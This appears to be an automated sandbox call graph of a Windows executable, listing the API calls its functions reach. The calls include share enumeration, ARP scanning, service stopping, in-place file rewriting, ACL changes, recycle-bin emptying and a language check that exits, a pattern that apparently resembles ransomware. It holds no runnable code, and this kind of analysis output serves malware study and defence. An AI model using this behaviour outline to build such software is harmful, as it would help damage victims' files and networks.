WideCharToMultiByte WideCharToMultiByte 72067 5c1f43 72063->72067 72064->72063 72065 5c223d SetFilePointerEx 72069 5c227b 72065->72069 72074 5c2283 72065->72074 72067->72065 72068 5c1f7b 72067->72068 72120 5c5c2d RtlAllocateHeap 72068->72120 72069->72073 72069->72074 72071 5c2293 ReadFile 72072 5c2199 72071->72072 72071->72074 72072->72073 72075 5c234b lstrcpyW lstrcatW 72072->72075 72073->72043 72073->72044 72074->72071 72074->72072 72078 5c22c8 SetFilePointerEx WriteFile 72074->72078 72077 5c2375 72075->72077 72076 5c1fa5 72121 5c5cd2 RtlFreeHeap 72076->72121 72081 5c23c7 12 API calls 72077->72081 72082 5c2993 SetFilePointerEx WriteFile 72077->72082 72078->72072 72079 5c230f SetFilePointerEx 72078->72079 72079->72071 72079->72074 72083 5c281c 10 API calls 72081->72083 72084 5c2806 72081->72084 72082->72073 72085 5c2967 72083->72085 72084->72083 72085->72085 72086 5c297d lstrcatW 72085->72086 72086->72073 72087 5c1f8b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 72087->72073 72087->72076 72088 5c20c1 SetFilePointerEx ReadFile 72087->72088 72089 5c2103 SetFilePointerEx WriteFile 72087->72089 72088->72087 72089->72087 72090->72014 72091->72014 72093 5c9f3d PeekMessageW 72092->72093 72094 5c8043 72093->72094 72095 5c9f23 72093->72095 72094->72006 72095->72093 72096 5c9f29 TranslateMessage DispatchMessageW 72095->72096 72096->72093 72097->72006 72098->71994 72100 5c706c EnterCriticalSection SetNamedSecurityInfoW GetNamedSecurityInfoW 72099->72100 72101 5c1aa8 SetFileAttributesW 72099->72101 72102 5c70dc 72100->72102 72103 5c70ae SetEntriesInAclW 72100->72103 72101->72032 72105 5c70ed 72102->72105 72106 5c70e8 LocalFree 72102->72106 72103->72102 72104 5c70c6 SetNamedSecurityInfoW 72103->72104 72104->72102 72107 5c70f8 LeaveCriticalSection 72105->72107 72108 5c70f3 LocalFree 72105->72108 72106->72105 72107->72101 72108->72107 72110 5ca4ab 72109->72110 72112 5ca4a4 72109->72112 72110->72112 72122 5c5c2d RtlAllocateHeap 72110->72122 72112->72042 72112->72112 72113 5ca60f 72124 5c5cd2 RtlFreeHeap 72113->72124 72115 5ca5e7 72123 5c5cd2 RtlFreeHeap 72115->72123 72116 5ca52e 72116->72112 72116->72113 72116->72115 72118 5ca589 CreateToolhelp32Snapshot 72116->72118 72118->72113 72119 5ca59e Module32FirstW CloseHandle StrStrIW 72118->72119 72119->72113 72119->72116 72120->72087 72121->72072 72122->72116 72123->72112 72124->72112 72126 5d1a97 3 API calls 72125->72126 72127 5c860a 72126->72127 72128 5d1a97 3 API calls 72127->72128 72132 5c8614 72128->72132 72129 5c8658 72142 5c5cd2 RtlFreeHeap 72129->72142 72131 5c862e WaitForSingleObject CloseHandle 72131->72132 72132->72129 72132->72131 72133 5c865d 72134 5d1a97 3 API calls 72133->72134 72135 5c866d 72134->72135 72136 5d1a97 3 API calls 72135->72136 72137 5c8677 72136->72137 72138 5d1a97 3 API calls 72137->72138 72139 5c8681 72138->72139 72139->72139 72143 5d1c06 72139->72143 72142->72133 72144 5d1c16 lstrlenW 72143->72144 72151 5c87cc 72143->72151 72154 5c5c2d RtlAllocateHeap 72144->72154 72146 5d1c30 lstrlenW 72155 5c5c2d RtlAllocateHeap 72146->72155 72148 5d1c43 72149 5d1c4d wvsprintfW 72148->72149 72150 5d1c98 72148->72150 72148->72151 72149->72150 72152 5d1c5f lstrcpyW EnterCriticalSection PostMessageW LeaveCriticalSection 72149->72152 72156 5c5cd2 RtlFreeHeap 72150->72156 72151->71804 72152->72150 72152->72151 72154->72146 72155->72148 72156->72151 72159 5c1035 72158->72159 72160 5c1027 72158->72160 72175 5c5c2d RtlAllocateHeap 72159->72175 72161 5c102a lstrlenA 72160->72161 72161->72159 72161->72161 72163 5c104d 72164 5c1055 lstrlenA 72163->72164 72166 5c10a3 72163->72166 72165 5c105e 72164->72165 72165->72166 72168 5c108f lstrlenA 72165->72168 72169 5c1076 MultiByteToWideChar 72165->72169 72176 5c5c2d RtlAllocateHeap 72165->72176 72166->71824 72166->71825 72168->72165 72169->72168 72171 5c1134 72170->72171 72172 5c1109 72170->72172 72171->71830 72172->72171 72173 5c1112 lstrcmpiW 72172->72173 72173->72171 72173->72172 72174->71829 72175->72163 72176->72165 72178 5cb4cd 72177->72178 72179 5cb872 72177->72179 72180 5c1000 6 API calls 72178->72180 72179->71841 72181 5cb4e4 72180->72181 72182 5cb865 CloseServiceHandle 72181->72182 72183 5cb85a 72181->72183 72185 5cb509 OpenServiceW 72181->72185 72189 5cb82d CloseServiceHandle 72181->72189 72190 5cb55e EnumDependentServicesW 72181->72190 72194 5cb5a3 EnumDependentServicesW 72181->72194 72198 5d1c06 9 API calls 72181->72198 72202 5cb415 ControlService 72181->72202 72207 5c5c2d RtlAllocateHeap 72181->72207 72208 5c5cd2 RtlFreeHeap 72181->72208 72182->72179 72209 5c10b9 RtlFreeHeap 72183->72209 72187 5cb51a GetLastError 72185->72187 72188 5cb525 QueryServiceStatusEx 72185->72188 72186 5cb864 72186->72182 72187->72181 72188->72181 72188->72189 72189->72181 72190->72181 72191 5cb57f GetLastError 72190->72191 72191->72181 72194->72181 72195 5cb5c3 OpenServiceW 72194->72195 72201 5cb5ef 72195->72201 72197 5cb415 4 API calls 72197->72201 72198->72181 72199 5cb721 CloseServiceHandle 72199->72201 72200 5d1c06 9 API calls 72200->72201 72201->72181 72201->72197 72201->72199 72201->72200 72204 5cb433 72202->72204 72206 5cb490 72202->72206 72203 5cb455 Sleep QueryServiceStatusEx 72203->72204 72204->72203 72205 5cb478 GetTickCount 72204->72205 72204->72206 72205->72204 72205->72206 72206->72181 72207->72181 72208->72181 72209->72186 72210->71849 72211->71855 72212->71857 72213->71861 72215 5c5c95 GetVersionExW 72214->72215 72215->71871 72216->71900 72218 5d1b7c lstrlenW 72217->72218 72226 5d1c01 72217->72226 72230 5c5c2d RtlAllocateHeap 72218->72230 72220 5d1b93 lstrlenW 72231 5c5c2d RtlAllocateHeap 72220->72231 72222 5d1ba4 72223 5d1bf6 72222->72223 72224 5d1bef 72222->72224 72225 5d1bae lstrcpyW lstrcpyW EnterCriticalSection PostMessageW LeaveCriticalSection 72222->72225 72223->72226 72233 5c5cd2 RtlFreeHeap 72223->72233 72232 5c5cd2 RtlFreeHeap 72224->72232 72225->72224 72225->72226 72226->71904 72229->71898 72230->72220 72231->72222 72232->72223 72233->72226 72235 5c5cfc WSAIoctl 72234->72235 72237 5c5d48 72234->72237 72236 5c5d3d closesocket 72235->72236 72235->72237 72236->72237 72237->71914 72237->71915 72239 5c5d7a 72238->72239 72240 5c5f91 72238->72240 72253 5c5c2d RtlAllocateHeap 72239->72253 72240->71914 72240->71927 72242 5c5d7f 72242->72240 72243 5c5d89 GetIpNetTable 72242->72243 72244 5c5f87 72243->72244 72251 5c5d99 72243->72251 72255 5c5cd2 RtlFreeHeap 72244->72255 72246 5c5dbd inet_ntoa WSAGetLastError 72246->72251 72247 5c5e18 StrStrIA 72247->72251 72248 5c5e6b StrStrIA 72248->72251 72249 5c5e9b StrStrIA 72249->72251 72250 5c5ef7 StrStrIA 72250->72251 72251->72244 72251->72246 72251->72247 72251->72248 72251->72249 72251->72250 72254 5c5c2d RtlAllocateHeap 72251->72254 72253->72242 72254->72251 72255->72240 72257 5c6358 ExitThread 72256->72257 72258 5c6360 GetQueuedCompletionStatus 72256->72258 72261 5c6386 72258->72261 72260 5c6399 setsockopt 72260->72261 72263 5c63b8 getsockopt 72260->72263 72261->72258 72261->72260 72262 5c6580 DeleteTimerQueue 72261->72262 72266 5c648f shutdown closesocket 72261->72266 72269 5c6514 72261->72269 72271 5c647a CancelIo 72261->72271 72273 5c64b7 GlobalFree 72261->72273 72275 5c6414 shutdown closesocket 72261->72275 72276 5c643c GlobalFree 72261->72276 72287 5c618d 72261->72287 72299 5c629a 72261->72299 72305 5c60e1 RtlAllocateHeap RtlFreeHeap WSAAddressToStringW EnterCriticalSection LeaveCriticalSection 72261->72305 72263->72261 72265 5c653d 72265->72262 72267 5c653f shutdown closesocket 72265->72267 72274 5c6567 GlobalFree 72265->72274 72266->72261 72267->72265 72269->72262 72269->72265 72272 5c652d CancelIo 72269->72272 72271->72261 72272->72269 72273->72261 72274->72265 72275->72261 72276->72261 72278 5c6073 EnterCriticalSection 72277->72278 72279 5c6098 72278->72279 72280 5c6084 LeaveCriticalSection Sleep 72278->72280 72279->72278 72281 5c60ac LeaveCriticalSection 72279->72281 72308 5c67b6 72279->72308 72327 5c5cd2 RtlFreeHeap 72279->72327 72280->72278 72281->72279 72282 5c60d1 72281->72282 72326 5c5cd2 RtlFreeHeap 72282->72326 72285 5c60d8 ExitThread 72288 5c619e 72287->72288 72298 5c61a5 72287->72298 72288->72261 72289 5c61ae GlobalAlloc 72290 5c626f 72289->72290 72291 5c61c5 WSASocketW 72289->72291 72306 5c5cd2 RtlFreeHeap 72290->72306 72292 5c61ea GlobalFree 72291->72292 72293 5c61f3 bind 72291->72293 72292->72298 72296 5c6225 closesocket 72293->72296 72297 5c6230 CreateIoCompletionPort 72293->72297 72296->72292 72297->72296 72297->72298 72298->72289 72298->72290 72300 5c62ab 72299->72300 72304 5c631d CreateTimerQueueTimer 72299->72304 72301 5c62bc htons 72300->72301 72302 5c62ff WSAGetLastError 72300->72302 72300->72304 72307 5c60e1 RtlAllocateHeap RtlFreeHeap WSAAddressToStringW EnterCriticalSection LeaveCriticalSection 72300->72307 72301->72300 72302->72300 72304->72257 72304->72261 72305->72261 72306->72288 72307->72300 72309 5c67d7 EnterCriticalSection NetShareEnum LeaveCriticalSection 72308->72309 72310 5c6806 72309->72310 72324 5c6813 72309->72324 72310->72309 72311 5c680e 72310->72311 72311->72279 72312 5c6a3e NetApiBufferFree 72312->72311 72313 5c6883 lstrcmpiW 72313->72324 72314 5c6a3b 72314->72312 72316 5c68ab lstrcpyW 72316->72324 72317 5c68ee StrCmpNW 72318 5c6963 lstrcatW 72317->72318 72317->72324 72319 5c6995 72318->72319 72319->72319 72321 5c69aa lstrcatW lstrcatW 72319->72321 72320 5c6954 lstrcatW 72320->72318 72322 5c7183 5 API calls 72321->72322 72322->72324 72324->72312 72324->72313 72324->72314 72324->72316 72324->72317 72324->72320 72325 5d1b5f 9 API calls 72324->72325 72328 5c5c2d RtlAllocateHeap 72324->72328 72329 5c5cd2 RtlFreeHeap 72324->72329 72325->72324 72326->72285 72327->72279 72328->72324 72329->72324 72331 5c6748 72330->72331 72332 5c6737 WaitForSingleObject CloseHandle 72330->72332 72333 5c676f 72331->72333 72334 5c6751 72331->72334 72332->72331 72336 5c6778 DeleteCriticalSection CloseHandle 72333->72336 72337 5c678b 72333->72337 72341 5c60e1 RtlAllocateHeap RtlFreeHeap WSAAddressToStringW EnterCriticalSection LeaveCriticalSection 72334->72341 72336->72337 72339 5d1a97 3 API calls 72337->72339 72338 5c6759 WaitForSingleObject CloseHandle 72338->72333 72340 5c67aa 72339->72340 72340->71933 72341->72338 72343 5d2025 72344 5d2031 ___scrt_is_nonwritable_in_current_image 72343->72344 72375 5d2221 72344->72375 72346 5d2038 72347 5d218b 72346->72347 72350 5d2062 72346->72350 72503 5d2521 4 API calls 2 library calls 72347->72503 72349 5d2192 72504 668f94 28 API calls _abort 72349->72504 72361 5d20a1 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 72350->72361 72500 668cb9 5 API calls _ValidateLocalCookies 72350->72500 72352 5d2198 72505 668f46 28 API calls _abort 72352->72505 72355 5d207b 72357 5d2081 72355->72357 72501 668c5d 5 API calls _ValidateLocalCookies 72355->72501 72356 5d21a0 72359 5d2102 72386 5d263c 72359->72386 72361->72359 72502 668f5c 38 API calls 2 library calls 72361->72502 72376 5d222a 72375->72376 72506 5d27e4 IsProcessorFeaturePresent 72376->72506 72378 5d2236 72507 66718e 10 API calls 2 library calls 72378->72507 72380 5d223b 72381 5d223f 72380->72381 72508 6697c4 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 72380->72508 72381->72346 72383 5d2248 72384 5d2256 72383->72384 72509 6671ad 7 API calls 2 library calls 72383->72509 72384->72346 72510 6672e0 72386->72510 72388 5d264f GetStartupInfoW 72389 5d2108 72388->72389 72390 668c0a 72389->72390 72511 675b17 72390->72511 72392 5d2110 72395 5c55df GetProcessHeap 72392->72395 72394 668c13 72394->72392 72515 675e21 38 API calls 72394->72515 72517 5cabd1 GetLocaleInfoW 72395->72517 72401 5c5608 MultiByteToWideChar 72402 5c5635 72401->72402 72539 5c7413 72402->72539 72404 5c563f 72549 5c6cb5 72404->72549 72410 5c5657 72588 5c87dd 72410->72588 72412 5c5660 WSAStartup GetComputerNameW InitializeCriticalSection 72613 5cecd9 72412->72613 72414 5c56ac 72414->72414 72415 5d1c06 9 API calls 72414->72415 72416 5c582b 72415->72416 72693 5ca7db GetCommandLineW lstrlenW 72416->72693 72420 5c58da 72422 5c590e 72420->72422 72425 5c59cf 72420->72425 72731 5c73f4 EnterCriticalSection LeaveCriticalSection 72420->72731 72421 5c585b 72421->72420 72428 5c58ba CreateMutexA WaitForSingleObject 72421->72428 72422->72425 72427 5c593b 72422->72427 72733 5c73f4 EnterCriticalSection LeaveCriticalSection 72422->72733 72424 5c58fe 72424->72422 72429 5c5902 72424->72429 72426 5c59e1 72425->72426 72735 5c73f4 EnterCriticalSection LeaveCriticalSection 72425->72735 72431 5c5a92 72426->72431 72439 5c5b65 72426->72439 72715 5caf2d 72426->72715 72427->72425 72710 5c73f4 EnterCriticalSection LeaveCriticalSection 72427->72710 72428->72420 72433 5c58d3 ExitProcess 72428->72433 72732 5c9585 21 API calls __vfprintf_l 72429->72732 72434 5c8c94 130 API calls 72431->72434 72437 5c5a97 72434->72437 72436 5c592b 72436->72427 72438 5c592f 72436->72438 72441 5c8d5c 15 API calls 72437->72441 72734 5c9abb 12 API calls 72438->72734 72440 5c5b72 72439->72440 72737 5d1b3f IsWindowVisible 72439->72737 72445 5c5ba8 GetMessageW 72440->72445 72451 5c5bb9 72440->72451 72457 5c5a9e 72441->72457 72442 5c5950 72442->72425 72446 5c5961 72442->72446 72711 5cc338 SHEmptyRecycleBinW 72442->72711 72450 5c5b8c TranslateMessage DispatchMessageW 72445->72450 72445->72451 72452 5c5980 72446->72452 72455 5c9ebc GetVersionExW 72446->72455 72450->72445 72738 5c7172 RtlFreeHeap EnterCriticalSection LeaveCriticalSection DeleteCriticalSection 72451->72738 72453 5c599d 72452->72453 72456 5cb21b 22 API calls 72452->72456 72458 5c59aa 72453->72458 72462 5cb8a2 17 API calls 72453->72462 72460 5c596e 72455->72460 72461 5c598d 72456->72461 72464 5c5ac0 72457->72464 72468 5c9f0e 3 API calls 72457->72468 72465 5c59bb 72458->72465 72466 5ca715 16 API calls 72458->72466 72459 5c5bc2 72739 5c7ccb CryptReleaseContext 72459->72739 72460->72452 72712 5c9e62 AllocateAndInitializeSid 72460->72712 72467 5c9e62 3 API calls 72461->72467 72462->72458 72477 5c7183 5 API calls 72464->72477 72465->72425 72472 5c6a84 82 API calls 72465->72472 72466->72465 72473 5c5992 72467->72473 72474 5c5ab0 Sleep 72468->72474 72469 5c5bc7 72740 5c1a01 DeleteCriticalSection 72469->72740 72478 5c59c8 72472->72478 72473->72453 72482 5cb87a 31 API calls 72473->72482 72474->72457 72476 5c5bcc 72741 5c6f36 7 API calls 72476->72741 72486 5c5afc 72477->72486 72481 5c6bf0 15 API calls 72478->72481 72480 5cbb5f 20 API calls 72480->72452 72481->72425 72482->72453 72483 5c5bd1 72742 5ca624 FreeLibrary 72483->72742 72485 5c5bd6 72743 5c8c37 7 API calls 72485->72743 72488 5c5b01 72486->72488 72496 5c5b16 72486->72496 72489 5c9f0e 3 API calls 72488->72489 72493 5c5b06 Sleep 72489->72493 72490 5c5bdb 72744 5c6a4a WSACleanup DeleteCriticalSection 72490->72744 72491 5c5b60 72736 5ca63c 7 API calls 72491->72736 72493->72486 72495 5c5be0 72745 5d1a8a DestroyWindow 72495->72745 72496->72491 72499 5caf2d 20 API calls 72496->72499 72498 5c5be5 72499->72491 72500->72355 72501->72361 72502->72359 72503->72349 72504->72352 72505->72356 72506->72378 72507->72380 72508->72383 72509->72381 72510->72388 72512 675b29 72511->72512 72513 675b20 72511->72513 72512->72394 72516 675a16 51 API calls 4 library calls 72513->72516 72515->72394 72516->72512 72518 5cadfb 72517->72518 72518->72518 72519 5c55fe 72518->72519 72520 5cae47 72518->72520 72522 5caeb5 GetSystemDefaultUILanguage 72519->72522 72521 5caea4 MessageBoxA ExitProcess 72520->72521 72523 5caf15 72522->72523 72524 5caf24 ExitProcess 72523->72524 72525 5c5603 72523->72525 72526 5c8e2e 72525->72526 72527 5c8ed8 72526->72527 72527->72527 72528 5c8eed StrStrA 72527->72528 72529 5c9135 72528->72529 72530 5c8f08 72528->72530 72529->72401 72531 5c8f34 GetCommandLineW CommandLineToArgvW 72530->72531 72531->72529 72534 5c8f59 72531->72534 72532 5c933d StrToIntW 72532->72534 72533 5c9f53 2 API calls 72533->72534 72534->72529 72534->72532 72534->72533 72535 5c9232 72534->72535 72535->72534 72537 5c9245 72535->72537 72746 5c9d60 11 API calls 72535->72746 72538 5c92b6 MessageBoxA ExitProcess 72537->72538 72540 5c74fc 72539->72540 72540->72540 72541 5c7507 CryptAcquireContextA 72540->72541 72542 5c7528 CryptAcquireContextA 72541->72542 72543 5c7be4 72541->72543 72542->72543 72545 5c76f3 CryptAcquireContextA 72542->72545 72543->72404 72545->72543 72547 5c7912 CryptAcquireContextA 72545->72547 72547->72543 72550 5c6cce 72549->72550 72551 5c5649 72549->72551 72747 5c6c41 GetCurrentProcess OpenProcessToken 72550->72747 72568 5ca0b9 72551->72568 72554 5c6dbc GetComputerNameW 72554->72551 72555 5c6ddd lstrcatW lstrlenW GetUserNameW 72554->72555 72555->72551 72557 5c6e4b 72555->72557 72752 5c5c2d RtlAllocateHeap 72557->72752 72559 5c6e52 72559->72551 72560 5c6e5f LookupAccountNameW 72559->72560 72561 5c6f1c 72560->72561 72562 5c6e8f InitializeSecurityDescriptor 72560->72562 72561->72551 72753 5c5cd2 RtlFreeHeap 72561->72753 72562->72561 72563 5c6e9e SetSecurityDescriptorDacl 72562->72563 72563->72561 72564 5c6eaf SetSecurityDescriptorOwner 72563->72564 72564->72561 72566 5c6ec4 BuildTrusteeWithSidW InitializeCriticalSection 72564->72566 72566->72551 72569 5ca14b 72568->72569 72569->72569 72570 5ca160 LoadLibraryA 72569->72570 72571 5c564e 72570->72571 72572 5ca17a GetProcAddress 72570->72572 72587 5c7109 InitializeCriticalSection EnterCriticalSection LeaveCriticalSection 72571->72587 72574 5ca236 72572->72574 72574->72574 72575 5ca249 GetProcAddress 72574->72575 72576 5ca289 72575->72576 72576->72576 72577 5ca294 GetProcAddress 72576->72577 72578 5ca32a 72577->72578 72578->72578 72579 5ca33f GetProcAddress 72578->72579 72580 5ca38a 72579->72580 72580->72580 72581 5ca39d GetProcAddress 72580->72581 72582 5ca3bd 72581->72582 72583 5ca476 FreeLibrary 72581->72583 72582->72583 72584 5ca3e9 GetCurrentProcess GetProcessId 72582->72584 72583->72571 72585 5ca455 72584->72585 72585->72585 72586 5ca460 GetEnvironmentVariableW 72585->72586 72586->72571 72587->72410 72754 5c7109 InitializeCriticalSection EnterCriticalSection LeaveCriticalSection 72588->72754 72590 5c87f9 72755 5c7109 InitializeCriticalSection EnterCriticalSection LeaveCriticalSection 72590->72755 72592 5c8803 72756 5c7109 InitializeCriticalSection EnterCriticalSection LeaveCriticalSection 72592->72756 72594 5c880d 72595 5c1000 6 API calls 72594->72595 72596 5c881c 72595->72596 72597 5c1000 6 API calls 72596->72597 72598 5c882b 72597->72598 72599 5c1000 6 API calls 72598->72599 72600 5c883a InitializeCriticalSection 72599->72600 72601 5c8892 72600->72601 72601->72601 72602 5c88a5 lstrcpyW 72601->72602 72603 5c8946 72602->72603 72603->72603 72604 5c8962 lstrcpyW 72603->72604 72605 5c8a29 72604->72605 72605->72605 72606 5c8a3e lstrcpyW 72605->72606 72607 5c8b03 72606->72607 72607->72607 72608 5c8b18 lstrcpyW 72607->72608 72609 5c8b6a 72608->72609 72609->72609 72610 5c8b75 lstrcpyW 72609->72610 72611 5c8c0f 72610->72611 72611->72611 72612 5c8c24 lstrcpyW 72611->72612 72612->72412 72614 5cecf7 #17 GetModuleHandleW 72613->72614 72615 5d1a83 72613->72615 72757 5cc34e 72614->72757 72615->72414 72617 5cedc3 lstrcpyW 72759 5c5c09 72617->72759 72619 5cee95 lstrcpyW RegisterClassW CreateWindowExW 72619->72615 72620 5cef3b RtlAllocateHeap 72619->72620 72621 5d1a6f 72620->72621 72622 5cef63 HeapAlloc 72620->72622 72621->72615 72623 5d1a78 HeapFree 72621->72623 72624 5cef7f InitializeCriticalSection CreateMenu CreatePopupMenu 72622->72624 72625 5d1a5b 72622->72625 72623->72615 72761 5d1f3c 72624->72761 72625->72615 72627 5d1a64 HeapFree 72625->72627 72627->72621 72628 5cf063 AppendMenuW 72763 5d1f2d 72628->72763 72632 5cf284 AppendMenuW 72767 5d1f1e 72632->72767 72634 5cf2eb AppendMenuW CreatePopupMenu 72769 5d1ded 72634->72769 72638 5cf5a8 AppendMenuW CreatePopupMenu 72773 5d1efa 72638->72773 72655 5d1e22 72656 5d0077 AppendMenuW 72655->72656 72789 5d1db8 72656->72789 72658 5d02b1 AppendMenuW CreatePopupMenu 72791 5d1d43 72658->72791 72660 5d0327 AppendMenuW 72793 5d1e11 72660->72793 72663 5d0781 72664 5d0868 CreateWindowExW GetWindowRect GetWindowRect 72663->72664 72665 5d1db8 72664->72665 72666 5d0abc CreateWindowExW SendMessageW SendMessageW 72665->72666 72667 5d0b7d 72666->72667 72668 5d0cb0 CreateWindowExW 72667->72668 72795 5d1da9 72668->72795 72670 5d0dff CreateWindowExW 72797 5d1d85 72670->72797 72672 5d0fc9 CreateWindowExW 72799 5d1d64 72672->72799 72674 5d1122 CreateWindowExW 72675 5c5c09 72674->72675 72676 5d121d CreateWindowExW 72675->72676 72677 5d1d43 72676->72677 72678 5d12b5 CreateWindowExW 72677->72678 72801 5d1d34 72678->72801 72680 5d1351 CreateWindowExW 72681 5d1382 72680->72681 72682 5d1483 GetWindowRect CreateWindowExW SendMessageW GetWindowRect 72681->72682 72803 5d1cf2 72682->72803 72684 5d1594 SendMessageW 72805 5d1cd1 72684->72805 72686 5d1653 6 API calls 72807 5d1cc2 72686->72807 72688 5d178f SendMessageW 72809 5d1cb3 72688->72809 72690 5d1829 SendMessageW 72811 5c951f 72690->72811 72692 5d1930 17 API calls 72692->72615 72813 5c5c2d RtlAllocateHeap 72693->72813 72695 5ca91d CommandLineToArgvW 72696 5c5837 72695->72696 72698 5ca93c 72695->72698 72696->72420 72709 5c73f4 EnterCriticalSection LeaveCriticalSection 72696->72709 72697 5ca916 72815 5c5cd2 RtlFreeHeap 72697->72815 72698->72696 72703 5c9f53 2 API calls 72698->72703 72704 5ca9ba 72698->72704 72700 5ca80c 72700->72695 72700->72697 72705 5ca89c 72700->72705 72702 5c9f53 2 API calls 72702->72705 72703->72698 72816 5ca9da 37 API calls __vfprintf_l 72704->72816 72705->72700 72705->72702 72707 5c7183 RtlAllocateHeap RtlFreeHeap EnterCriticalSection lstrcmpiW LeaveCriticalSection 72705->72707 72708 5d1b5f 9 API calls 72705->72708 72814 5c9f8a GetFileAttributesW 72705->72814 72707->72705 72708->72705 72709->72421 72710->72442 72711->72446 72713 5c9e98 CheckTokenMembership FreeSid 72712->72713 72714 5c5977 72712->72714 72713->72714 72714->72452 72714->72480 72716 5caf4c lstrlenA 72715->72716 72717 5cb216 72715->72717 72716->72717 72718 5caf61 InternetOpenW 72716->72718 72717->72431 72718->72717 72719 5caf79 MultiByteToWideChar 72718->72719 72720 5cafea 72719->72720 72720->72720 72721 5caff5 lstrcpyW lstrcatW 72720->72721 72722 5cb051 72721->72722 72722->72722 72723 5cb066 lstrcatW lstrlenW InternetOpenUrlW 72722->72723 72724 5cb0af InternetReadFile 72723->72724 72725 5cb213 InternetCloseHandle 72723->72725 72726 5cb0ca 72724->72726 72727 5cb0d0 InternetCloseHandle 72724->72727 72725->72717 72726->72724 72726->72727 72728 5cb17f 72727->72728 72729 5d1c06 9 API calls 72728->72729 72730 5cb210 72729->72730 72730->72725 72731->72424 72732->72422 72733->72436 72734->72427 72735->72426 72736->72439 72737->72440 72738->72459 72739->72469 72740->72476 72741->72483 72742->72485 72743->72490 72744->72495 72745->72498 72746->72535 72748 5c6cae 72747->72748 72749 5c6c67 LookupPrivilegeValueW 72747->72749 72748->72551 72748->72554 72750 5c6c7e AdjustTokenPrivileges 72749->72750 72751 5c6ca5 CloseHandle 72749->72751 72750->72751 72751->72748 72752->72559 72753->72551 72754->72590 72755->72592 72756->72594 72758 5cc350 72757->72758 72758->72617 72758->72758 72760 5c5c0f 72759->72760 72760->72619 72760->72760 72762 5d1f42 72761->72762 72762->72628 72762->72762 72764 5cf133 AppendMenuW 72763->72764 72765 5d1e22 72764->72765 72766 5d1e2b 72765->72766 72766->72632 72766->72766 72768 5d1f20 72767->72768 72768->72634 72768->72768 72770 5cf3e4 AppendMenuW 72769->72770 72771 5c9561 72770->72771 72772 5c9567 72771->72772 72772->72638 72772->72772 72774 5cf6bf AppendMenuW 72773->72774 72775 5d1ed6 72774->72775 72776 5cf82a AppendMenuW 72775->72776 72777 5d1eb5 72776->72777 72778 5cf90d AppendMenuW 72777->72778 72779 5d1ea6 72778->72779 72780 5cfa1c AppendMenuW CreatePopupMenu 72779->72780 72781 5d1e97 72780->72781 72782 5cfa98 AppendMenuW 72781->72782 72783 5d1e88 72782->72783 72784 5cfc08 AppendMenuW 72783->72784 72785 5d1e67 72784->72785 72786 5cfd74 AppendMenuW 72785->72786 72787 5d1e43 72786->72787 72788 5cff3e AppendMenuW 72787->72788 72788->72655 72790 5d1dbe 72789->72790 72790->72658 72790->72790 72792 5d1d4c 72791->72792 72792->72660 72792->72792 72794 5d0396 AppendMenuW KiUserCallbackDispatcher GetWindowRect 72793->72794 72794->72663 72796 5d1dab 72795->72796 72796->72670 72796->72796 72798 5d1d8b 72797->72798 72798->72672 72798->72798 72800 5d1d6d 72799->72800 72800->72674 72800->72800 72802 5d1d36 72801->72802 72802->72680 72802->72802 72804 5d1cfb 72803->72804 72804->72684 72804->72804 72806 5d1cda 72805->72806 72806->72686 72806->72806 72808 5d1cc4 72807->72808 72808->72688 72808->72808 72810 5d1cb5 72809->72810 72810->72690 72810->72810 72812 5c9528 72811->72812 72812->72692 72812->72812 72813->72700 72814->72705 72815->72695 72816->72698 72817 5db8c0 72818 5db8c9 72817->72818 72820 5db8ea __vfprintf_l 72818->72820 72822 669d0f 72818->72822 72828 67718e _abort 72822->72828 72823 6771cc 72830 66e400 20 API calls _abort 72823->72830 72825 6771b7 RtlAllocateHeap 72826 5db914 72825->72826 72825->72828 72828->72823 72828->72825 72829 677aff 7 API calls 2 library calls 72828->72829 72829->72828 72830->72826 72831 5dbae0 72832 5dbaeb 72831->72832 72833 5dbaf2 __vfprintf_l 72832->72833 72834 669d0f _strftime 21 API calls 72832->72834 72834->72833 72835 5f4200 72860 680280 72835->72860 72838 5f422f CryptGenRandom 72840 5f426a CryptReleaseContext 72838->72840 72841 5f4244 __vfprintf_l 72838->72841 72839 5f4276 CryptAcquireContextW 72842 5f42da 72839->72842 72843 5f4293 CryptGenRandom 72839->72843 72840->72839 72874 5dac50 21 API calls 2 library calls 72841->72874 72862 5f4360 72842->72862 72845 5f42ce CryptReleaseContext 72843->72845 72846 5f42a8 __vfprintf_l 72843->72846 72845->72842 72875 5dac50 21 API calls 2 library calls 72846->72875 72848 5f42f4 __vfprintf_l 72876 5dac50 21 API calls 2 library calls 72848->72876 72851 5f4267 72851->72840 72852 5f42cb 72852->72845 72854 5f430d GetCurrentProcessId 72855 5f4324 __vfprintf_l 72854->72855 72877 5dac50 21 API calls 2 library calls 72855->72877 72857 5f433d 72878 5d29c1 5 API calls ___raise_securityfailure 72857->72878 72859 5f4350 72861 5f420a CryptAcquireContextW 72860->72861 72861->72838 72861->72839 72863 5f436a __vfprintf_l 72862->72863 72864 5f43b3 GetTickCount 72863->72864 72865 5f4373 QueryPerformanceCounter 72863->72865 72866 5f43c6 __vfprintf_l 72864->72866 72867 5f4382 72865->72867 72868 5f4389 __vfprintf_l 72865->72868 72880 5dac50 21 API calls 2 library calls 72866->72880 72867->72864 72879 5dac50 21 API calls 2 library calls 72868->72879 72871 5f43da 72873 5f42df GlobalMemoryStatus 72871->72873 72872 5f43a7 72872->72864 72872->72873 72873->72848 72874->72851 72875->72852 72876->72854 72877->72857 72878->72859 72879->72872 72880->72871 72881 677988 72882 677993 72881->72882 72883 6779bb 72882->72883 72885 6779ac 72882->72885 72884 6779ca 72883->72884 72903 67bc14 27 API calls 2 library calls 72883->72903 72890 6781a7 72884->72890 72902 66e400 20 API calls _abort 72885->72902 72889 6779b1 __vfprintf_l 72891 6781b4 72890->72891 72892 6781bf 72890->72892 72904 67718e 21 API calls 2 library calls 72891->72904 72894 6781c7 72892->72894 72901 6781d0 _abort 72892->72901 72905 675155 20 API calls _free 72894->72905 72895 6781d5 72906 66e400 20 API calls _abort 72895->72906 72896 6781fa RtlReAllocateHeap 72899 6781bc 72896->72899 72896->72901 72899->72889 72901->72895 72901->72896 72907 677aff 7 API calls 2 library calls 72901->72907 72902->72889 72903->72884 72904->72899 72905->72899 72906->72899 72907->72901

                                  Executed Functions

